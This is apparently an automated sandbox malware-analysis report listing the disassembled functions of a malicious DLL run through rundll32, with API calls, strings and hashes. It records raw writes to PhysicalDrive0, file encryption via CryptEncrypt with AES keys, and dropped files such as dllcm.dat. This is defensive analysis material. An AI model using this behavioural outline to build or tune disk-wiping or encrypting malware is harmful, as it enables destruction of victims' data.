                                                • Opcode ID: 4bfea066a8a93ebde044250ff403403188927b27fefccc7584a7e979da662ddb
                                                • Instruction ID: eafc004910f7370859cbdc70821778bdb61d3808fa2ab80758d5d85ef338a3cf
                                                • Opcode Fuzzy Hash: 4bfea066a8a93ebde044250ff403403188927b27fefccc7584a7e979da662ddb
                                                • Instruction Fuzzy Hash: FE51CD311A4326EADB219F24CC48BAB73A9EF54258F44EA19FC69CA090F732D254C761
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E55A7E Relevance: 14.4, APIs: 9, Instructions: 901COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ioctlsocketsocket
                                                • String ID:
                                                • API String ID: 416004797-0
                                                • Opcode ID: 8cead146b6a088078a9f8eeb3b44ef399cb97cdd3123096ae135a4a078088789
                                                • Instruction ID: 67cca55c72d50ad94d38a2a6249b376be6624ec6a8431439bd16e3cec662d4a8
                                                • Opcode Fuzzy Hash: 8cead146b6a088078a9f8eeb3b44ef399cb97cdd3123096ae135a4a078088789
                                                • Instruction Fuzzy Hash: 5B724B311A4325BFDF119F61CD40E9BBBEAAF89388F80A918FE8496020E371D555DF52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E58CBF Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 70filememoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,40000000,00000003,00000000,00000003,00000000,00000000,00000000,00000000), ref: 02E58CDB
                                                • DeviceIoControl.KERNELBASE(00000000,00070000,00000000,00000000,?,00000018,?,00000000), ref: 02E58D04
                                                • LocalAlloc.KERNEL32(00000000,02E58DFD,?,?,?,?,?,?,?,02E58DFD), ref: 02E58D0E
                                                • DeviceIoControl.KERNELBASE(00000000,00090020,00000000,00000000,00000000,00000000,?,00000000), ref: 02E58D2A
                                                • WriteFile.KERNELBASE(00000000,?,02E58DFD,?,00000000,?,?,?,?,?,?,?,02E58DFD), ref: 02E58D3C
                                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,02E58DFD), ref: 02E58D45
                                                • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,02E58DFD), ref: 02E58D4C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ControlDeviceFileLocal$AllocChangeCloseCreateFindFreeNotificationWrite
                                                • String ID: \\.\PhysicalDrive0
                                                • API String ID: 3555062078-1180397377
                                                • Opcode ID: 5e2aea2d6238d2b70d994a9eeae9bae0038e3415eed4b58e18313ac4a78727d0
                                                • Instruction ID: 0130113a2c84401fc303af2e91866e141b4e6e9d2cc022a82f763fc4ca1d1e50
                                                • Opcode Fuzzy Hash: 5e2aea2d6238d2b70d994a9eeae9bae0038e3415eed4b58e18313ac4a78727d0
                                                • Instruction Fuzzy Hash: 7F115672A91238BFD72196A29D89EDF7FACEF4A665F005811F506E6040D6709680C7B0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5189A Relevance: 13.6, APIs: 9, Instructions: 84fileencryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000000,00000000,F0000000,?,75B05180,?,?,?,?,02E51B25,?), ref: 02E518B3
                                                • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,02E51B25,?,?), ref: 02E518CC
                                                • CreateFileMappingW.KERNELBASE(00000000,00000000,00000004,00000000,?,00000000,?,?,?,?,02E51B25,?), ref: 02E518F2
                                                • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,?,?,?,?,?,02E51B25,?), ref: 02E51907
                                                • CryptEncrypt.ADVAPI32(FFFFFFFE,00000000,00000001,00000000,00000000,?,?,?,?,?,?,02E51B25,?), ref: 02E51924
                                                • FlushViewOfFile.KERNEL32(00000000,?,?,?,?,?,02E51B25,?), ref: 02E51932
                                                • UnmapViewOfFile.KERNEL32(00000000,?,?,?,?,02E51B25,?), ref: 02E51939
                                                • FindCloseChangeNotification.KERNELBASE(?,?,?,?,?,02E51B25,?), ref: 02E51942
                                                • FindCloseChangeNotification.KERNELBASE(02E51B25,?,?,?,?,02E51B25,?), ref: 02E5194B
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$View$ChangeCloseCreateFindNotification$CryptEncryptFlushMappingSizeUnmap
                                                • String ID:
                                                • API String ID: 4229333957-0
                                                • Opcode ID: 2821bdad510c8910b6f1ec88c46c9005b4d60714543bb4d7b0c62e5bfdc43818
                                                • Instruction ID: 9508df9f3b89948b74a190c0d37a151c8ee81940d500e7a81532e65a4605fdb0
                                                • Opcode Fuzzy Hash: 2821bdad510c8910b6f1ec88c46c9005b4d60714543bb4d7b0c62e5bfdc43818
                                                • Instruction Fuzzy Hash: 5E216B31991228BFDB219FA6CD48EEF7F79EF0A6A5F408121F909E6150D7308591DBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E51E51 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 63encryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,F0000000), ref: 02E51E74
                                                • GetLastError.KERNEL32 ref: 02E51E7A
                                                • CryptAcquireContextW.ADVAPI32(?,00000000,Microsoft Enhanced RSA and AES Cryptographic Provider,00000018,00000008), ref: 02E51EA3
                                                • CryptDestroyKey.ADVAPI32(?,?,?,0000000F,?), ref: 02E51EC9
                                                • CryptReleaseContext.ADVAPI32(?,00000000), ref: 02E51ED4
                                                • LocalFree.KERNEL32(?), ref: 02E51EE0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$Context$Acquire$DestroyErrorFreeLastLocalRelease
                                                • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                • API String ID: 2290729596-63410773
                                                • Opcode ID: c83ea47538e0d76924dad0f3cbbbd4b83b6524250d56a1fe9c6b5e151615944d
                                                • Instruction ID: 89fe3e1f6dd277b56508b2ce47dbb55513a35e572d998f8088231b6473662918
                                                • Opcode Fuzzy Hash: c83ea47538e0d76924dad0f3cbbbd4b83b6524250d56a1fe9c6b5e151615944d
                                                • Instruction Fuzzy Hash: 5B11C4316E0338BBDB205A629C05F9F3A9DAF45B55F009415FE08EF180CBA4E94197B4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E5A2E8 Relevance: 12.1, APIs: 8, Instructions: 86networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • memset.MSVCRT ref: 02E5A317
                                                • socket.WS2_32(00000002,00000001,00000000), ref: 02E5A335
                                                • htons.WS2_32(?), ref: 02E5A355
                                                • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 02E5A369
                                                • connect.WS2_32(00000000,?,?), ref: 02E5A37B
                                                • select.WS2_32(00000001,00000000,?,00000000,?), ref: 02E5A3A8
                                                • __WSAFDIsSet.WS2_32(00000000,?), ref: 02E5A3BB
                                                • closesocket.WS2_32(00000000), ref: 02E5A3C9
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: closesocketconnecthtonsioctlsocketmemsetselectsocket
                                                • String ID:
                                                • API String ID: 1369790671-0
                                                • Opcode ID: 18660b148e12b52562549ad42949e481593193dd9d52d5b958fe8eb1c98895e7
                                                • Instruction ID: a8c36453a5be70ba6652bae0ec66c3f27042949729b2d7314245017f4c78596c
                                                • Opcode Fuzzy Hash: 18660b148e12b52562549ad42949e481593193dd9d52d5b958fe8eb1c98895e7
                                                • Instruction Fuzzy Hash: 13318FB5C50328BFDB109FA5CC88AEEBBBCFF48314F004966E919E2150E7749A95CB51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E585D0 Relevance: 10.6, APIs: 7, Instructions: 62memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadResource.KERNEL32(02CE5020,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E585E2
                                                • LockResource.KERNEL32(00000000,?,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E585F2
                                                • SizeofResource.KERNEL32(02CE5020,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E58607
                                                • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E5861F
                                                • RtlAllocateHeap.NTDLL(00000000,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E58622
                                                • GetProcessHeap.KERNEL32(00000000,?,00000000,02CE5020,-00000004,000000C1,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?), ref: 02E58665
                                                • HeapFree.KERNEL32(00000000,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E58668
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$Resource$Process$AllocateFreeLoadLockSizeof
                                                • String ID:
                                                • API String ID: 3946667768-0
                                                • Opcode ID: b3ce8916b44158e3f36243c531247f80a28ad1d8725c0ec802e05abf27a96b28
                                                • Instruction ID: 1a0249eff606078e73b24f9dfcc3f332cf31fd3db8fd4a23f7096a459ac6dc19
                                                • Opcode Fuzzy Hash: b3ce8916b44158e3f36243c531247f80a28ad1d8725c0ec802e05abf27a96b28
                                                • Instruction Fuzzy Hash: 4F116DB19A0225AFDB15AFA6DC08F9A7BB9EF48368F008518FD45D7250DB70D990CB60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E51B4E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38encryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CryptGenKey.ADVAPI32(?,0000660E,00000001,?,?,Microsoft Enhanced RSA and AES Cryptographic Provider), ref: 02E51B66
                                                • CryptSetKeyParam.ADVAPI32(?,00000004,?,00000000,F0000000), ref: 02E51B87
                                                • CryptSetKeyParam.ADVAPI32(?,00000003,?,00000000), ref: 02E51B96
                                                Strings
                                                • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 02E51B54
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Crypt$Param
                                                • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                                                • API String ID: 29517873-63410773
                                                • Opcode ID: b8561d7f951ddc34b6cb8a52da6610914a14d0b0f5e03f5ac07b1cd30c39c858
                                                • Instruction ID: ff71c3edaee95b7e7da4e7185d5fdcb8adfa6df752cd9e41303c231676d638c2
                                                • Opcode Fuzzy Hash: b8561d7f951ddc34b6cb8a52da6610914a14d0b0f5e03f5ac07b1cd30c39c858
                                                • Instruction Fuzzy Hash: 76F017B6A80218BEEB009F99DC81FAABBBDEF44704F104469A701E7191D671DA15CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E58243 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                Download Yara Rule
                                                APIs
                                                • NetServerGetInfo.NETAPI32(00000000,00000065,?,6F9B4950,?,?,02E58FCD), ref: 02E58254
                                                • NetApiBufferFree.NETAPI32(?,?,?,02E58FCD), ref: 02E58277
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: BufferFreeInfoServer
                                                • String ID:
                                                • API String ID: 3855943681-0
                                                • Opcode ID: e9485f5e6b81f46b1f88d0c2195f975262ab6f0874469d9f7fba7ffeb2a2b687
                                                • Instruction ID: f1ff8b5e69461baa88bf571e2d4235c4b086bff244a925521fa7acc11d7b03dc
                                                • Opcode Fuzzy Hash: e9485f5e6b81f46b1f88d0c2195f975262ab6f0874469d9f7fba7ffeb2a2b687
                                                • Instruction Fuzzy Hash: 3EE09B39A51734A7DF28CA568D04FAB7A5CDF01599F105018EC86D2104D720DE4186D0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E57545 Relevance: 42.2, APIs: 20, Strings: 4, Instructions: 193memorythreadprocessCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • GetCurrentProcess.KERNEL32(?,74DF0F10,?,02E57EB2), ref: 02E5755C
                                                • GetModuleHandleW.KERNEL32(kernel32.dll,IsWow64Process,?,74DF0F10,?,02E57EB2), ref: 02E57571
                                                • GetProcAddress.KERNEL32(00000000), ref: 02E57578
                                                • FindResourceW.KERNEL32(00000001,0000000A,?,74DF0F10,?,02E57EB2), ref: 02E5759B
                                                • GetTempPathW.KERNEL32(00000208,?,?,74DF0F10,?,02E57EB2), ref: 02E575CC
                                                • GetTempFileNameW.KERNELBASE(?,00000000,00000000,?,?,74DF0F10,?,02E57EB2), ref: 02E575EA
                                                • CoCreateGuid.OLE32(?,00000000,?,74DF0F10,?,02E57EB2), ref: 02E57608
                                                • StringFromCLSID.OLE32(?,?,?,74DF0F10,?,02E57EB2), ref: 02E57621
                                                • wsprintfW.USER32 ref: 02E5765E
                                                • CreateThread.KERNELBASE(00000000,00000000,02E573FD,?,00000000,00000000), ref: 02E57675
                                                • memset.MSVCRT ref: 02E57698
                                                • wsprintfW.USER32 ref: 02E576C0
                                                • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02E576E5
                                                • WaitForSingleObject.KERNEL32(?,0000EA60), ref: 02E576F7
                                                  • Part of subcall function 02E570FA: EnterCriticalSection.KERNEL32(02CD5F60,02E57EBD), ref: 02E570FF
                                                  • Part of subcall function 02E570FA: InterlockedExchange.KERNEL32(02CD5F88,00000001), ref: 02E5710B
                                                  • Part of subcall function 02E570FA: LeaveCriticalSection.KERNEL32(02CD5F60), ref: 02E57112
                                                • TerminateThread.KERNELBASE(?,00000000), ref: 02E5770C
                                                • CloseHandle.KERNEL32(?), ref: 02E57715
                                                • DeleteFileW.KERNELBASE(?,?,?), ref: 02E57744
                                                • CoTaskMemFree.OLE32(?,?,?,?,74DF0F10,?,02E57EB2), ref: 02E5774D
                                                • GetProcessHeap.KERNEL32(00000000,?,?,74DF0F10,?,02E57EB2), ref: 02E5776A
                                                • RtlFreeHeap.NTDLL(00000000,?,74DF0F10,?,02E57EB2), ref: 02E57771
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateProcess$CriticalFileFreeHandleHeapSectionTempThreadwsprintf$AddressCloseCurrentDeleteEnterExchangeFindFromGuidInterlockedLeaveModuleNameObjectPathProcResourceSingleStringTaskTerminateWaitmemset
                                                • String ID: "%ws" %ws$IsWow64Process$\\.\pipe\%ws$kernel32.dll
                                                • API String ID: 1832780381-754074379
                                                • Opcode ID: 162f02784d7d318620a80048e3569ef6996e7bb69a6487439eece5b4f6981813
                                                • Instruction ID: 7e71dfc1fb657d3c3363c56dc7ade32f157db73c8f85a56593c65f93b0986468
                                                • Opcode Fuzzy Hash: 162f02784d7d318620a80048e3569ef6996e7bb69a6487439eece5b4f6981813
                                                • Instruction Fuzzy Hash: B9512F71E90228AFEB10DFE5DD88DEEB77DEF08245F545469FA06E2110D7309AA4CB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E594A5 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 81memoryfileCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • FreeLibrary.KERNELBASE ref: 02E594B2
                                                • CreateFileW.KERNELBASE(C:\Windows\dllcm.dat,80000000,00000001,00000000,00000003,00000000,00000000), ref: 02E594E9
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 02E594F4
                                                • FindCloseChangeNotification.KERNELBASE(?), ref: 02E59500
                                                • CreateFileW.KERNELBASE(C:\Windows\dllcm.dat,40000000,00000000,00000000,00000002,00000000,00000000), ref: 02E59512
                                                • GetProcessHeap.KERNEL32(00000008,?), ref: 02E59526
                                                • RtlAllocateHeap.NTDLL(00000000), ref: 02E59529
                                                • WriteFile.KERNELBASE(?,00000000,?,?,00000000), ref: 02E59542
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02E5954C
                                                • HeapFree.KERNEL32(00000000), ref: 02E5954F
                                                • CloseHandle.KERNEL32(?), ref: 02E59558
                                                • DeleteFileW.KERNELBASE(C:\Windows\dllcm.dat), ref: 02E5955F
                                                • ExitProcess.KERNEL32 ref: 02E59585
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$Heap$Process$CloseCreateFree$AllocateChangeDeleteExitFindHandleLibraryNotificationSizeWrite
                                                • String ID: C:\Windows\dllcm.dat
                                                • API String ID: 1556359713-1561905061
                                                • Opcode ID: 3edc51f01909199ed159fa73e3342aaace5ccffd4ff9787098d338ef99149068
                                                • Instruction ID: 13a9ad2a444ab4c01acc1be667f6f7920c15699eaa53bd02a85199604e84812a
                                                • Opcode Fuzzy Hash: 3edc51f01909199ed159fa73e3342aaace5ccffd4ff9787098d338ef99149068
                                                • Instruction Fuzzy Hash: F321F8718D1224FBCB116FA2ED0CE8FBF6AEF49754F508815FA02A2151C73586A1DBB0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 02E58999 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 110memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 332 2e58999-2e589c1 FindResourceW 333 2e589c3-2e589cb call 2e585d0 332->333 334 2e589d2 332->334 337 2e589d0 333->337 336 2e589d4-2e589d6 334->336 338 2e58abd-2e58acc SetLastError 336->338 339 2e589dc-2e58a06 GetProcessHeap HeapAlloc 336->339 337->336 340 2e58a12-2e58a22 SHGetFolderPathW 339->340 341 2e58a08-2e58a10 GetWindowsDirectoryW 339->341 343 2e58a24-2e58a29 340->343 344 2e58a59-2e58a66 GetProcessHeap HeapFree 340->344 342 2e58a3b-2e58a3d 341->342 342->344 345 2e58a3f-2e58a44 342->345 347 2e58a2c-2e58a35 343->347 346 2e58a6d-2e58a74 344->346 345->344 348 2e58a46-2e58a57 PathAppendW 345->348 349 2e58a76-2e58a7f call 2e58946 346->349 350 2e58aa1-2e58aa9 346->350 347->347 351 2e58a37-2e58a39 347->351 348->346 355 2e58a84-2e58a86 349->355 353 2e58ab2-2e58abc GetProcessHeap HeapFree 350->353 354 2e58aab-2e58ab0 350->354 351->342 353->338 354->353 354->354 356 2e58a88-2e58a94 GetLastError 355->356 357 2e58a9a 355->357 356->350 358 2e58a96 356->358 357->350 358->357
                                                APIs
                                                • FindResourceW.KERNEL32(00000003,0000000A,00000000,74DF0F10), ref: 02E589B9
                                                • GetProcessHeap.KERNEL32(00000008,00000208,02CD5F60), ref: 02E589EA
                                                • HeapAlloc.KERNEL32(00000000), ref: 02E589ED
                                                • GetWindowsDirectoryW.KERNEL32(00000000,00000104), ref: 02E58A0A
                                                • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,00000000), ref: 02E58A1A
                                                • PathAppendW.SHLWAPI(dllhost.dat), ref: 02E58A51
                                                • GetProcessHeap.KERNEL32(00000000), ref: 02E58A61
                                                • HeapFree.KERNEL32(00000000), ref: 02E58A64
                                                • GetLastError.KERNEL32(02D95060,?,00000000), ref: 02E58A88
                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 02E58AB7
                                                • HeapFree.KERNEL32(00000000), ref: 02E58ABA
                                                • SetLastError.KERNEL32(?), ref: 02E58AC0
                                                  • Part of subcall function 02E585D0: LoadResource.KERNEL32(02CE5020,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E585E2
                                                  • Part of subcall function 02E585D0: LockResource.KERNEL32(00000000,?,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E585F2
                                                  • Part of subcall function 02E585D0: SizeofResource.KERNEL32(02CE5020,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E58607
                                                  • Part of subcall function 02E585D0: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E5861F
                                                  • Part of subcall function 02E585D0: RtlAllocateHeap.NTDLL(00000000,?,?,?,02E52121,000001BD,00000000,?,?,02E564AC,?,?), ref: 02E58622
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.1670404172.0000000002E51000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E50000, based on PE: true
                                                • Associated: 00000001.00000002.1670391522.0000000002E50000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670422121.0000000002E5D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E66000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670439890.0000000002E6F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                • Associated: 00000001.00000002.1670467256.0000000002E70000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_1_2_2e50000_rundll32.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Heap$ProcessResource$ErrorFreeLastPath$AllocAllocateAppendDirectoryFindFolderLoadLockSizeofWindows
                                                • String ID: dllhost.dat
                                                • API String ID: 957509510-565127240
                                                • Opcode ID: 81da9aac9226610060e3de8547fc8e14c577530e43c52ef93222fde06d4fa983
                                                • Instruction ID: 07cbd6ea2ecc11b95a6dceaf6fb2782a2d9d716bfffac4d9b6c60a25ae01dc4a
                                                • Opcode Fuzzy Hash: 81da9aac9226610060e3de8547fc8e14c577530e43c52ef93222fde06d4fa983
